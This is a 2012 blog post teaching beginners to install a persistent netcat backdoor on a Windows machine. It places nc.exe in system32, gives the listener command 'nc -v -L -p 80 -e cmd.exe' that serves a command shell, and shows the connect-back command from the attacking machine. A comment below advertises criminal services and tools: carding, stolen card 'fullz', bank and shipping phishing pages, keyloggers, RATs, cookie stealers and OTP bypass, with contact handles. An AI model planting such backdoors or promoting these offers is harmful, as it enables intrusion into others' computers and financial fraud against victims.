Pages

Tuesday, October 23, 2012

Backdoor via Netcat


Most of you are probably asking what is NetCat? To make it simple, 

NetCat/NC makes and accepts Transmission Control Protocol (TCP) 

and User Datagram Protocol (UDP) connections. Literally that's it lol

This is for the newbees who dont know what NC is and want to 

know how to backdoor using this software.


How to make a persistent backdoor with NetCat

This is the overview of what we are going to be doing. The fist thing 

we want to do is put nc.exe, which is the executable file, in 

system32. Then After that we are going to head to CMD and make a 

persistent listener. 

1. Downlaod NC
http://www.downloadnetcat.com/

2. Place NC.exe in system32

3. Go to CMD and type this Command Line.



Code:
nc -v -L -p 80 -e cmd.exe


Let me explain the code, -v is verbose, -L is to make it Listen which 

is different from -l because if you would have put -l parameters 

instead of -L parameters, once you close the CMD window, the NC 

session will be closed as well. -p is the port you want to listen to. -e 

is the executable program you want to launch once the connection is 

established, in our case, command prompt.

Now you can close the window and still have NC listening on port 

80. Now that you have backdoored the remote machine with it, its 

time to connect to it.

On the attacking machine, go to CMD and type this command line:



Code:
nc -v [IpOfTargetMachine] 80


Once you hit enter, you will have CMD access to the remote computer!

  

credit to connhen4mat

1 comment:

  1. Hello world
    I teach hacking andriod apk virus - windows Hacking - web server hacking -
    Reseller :- Hacking Tools & Hacking services, Also Teach Hacking Methods Via teem weaver or Anydesk,
    Each Method Take minimum 1 hour to learn with vedio Tutorial And Hacking Tools ,

    How to Make Money hacking tools,

    - Spamming & Tools ,
    - Carding & Tools ,
    - Virus with control panal and Spy bot files,
    - Virus With Builder And Crypter ,
    - Scanners with Bruters ,
    - Crypters with Doc Exploits ,pdf Exploits ,TExtfile Exploits ,
    - PHP Exploits with shell and mailer
    - OTP verications Bypass with Bulletproof Scam-page and Otp control
    - Company Ceo or cfo leads Any country
    - Rat virus with builder
    - Cookies Stealers and Builder
    - keyloger and builder
    - Credit card Scam-pages
    - Bank login Scam-pages
    - debit card topup scam page
    - donation scam-page
    - dhl login and tracking scam-page
    - fedax login and tracking scam-page
    - Shipping Tools

    Place & Ground
    learners you will pay cheap $ for demo Tools & Method

    Business grounds

    Credit card Low Interest Services,

    - Credit card with Fullz Information - Minimum Investment 150$ - With 50k Credit limit And balance
    - Debit Card Topup AS per Card limit - Minimum Investment 200$ - With 8000$ balance
    - Dating scam Fresh male female Logins - Minimum Investment 80$ - Dating Login upto 30

    -----------------
    ABOUT US :
    Icq :-675452902
    Skype: rushr00t000
    email me:- hackitbackd00r@gmail.com

    ReplyDelete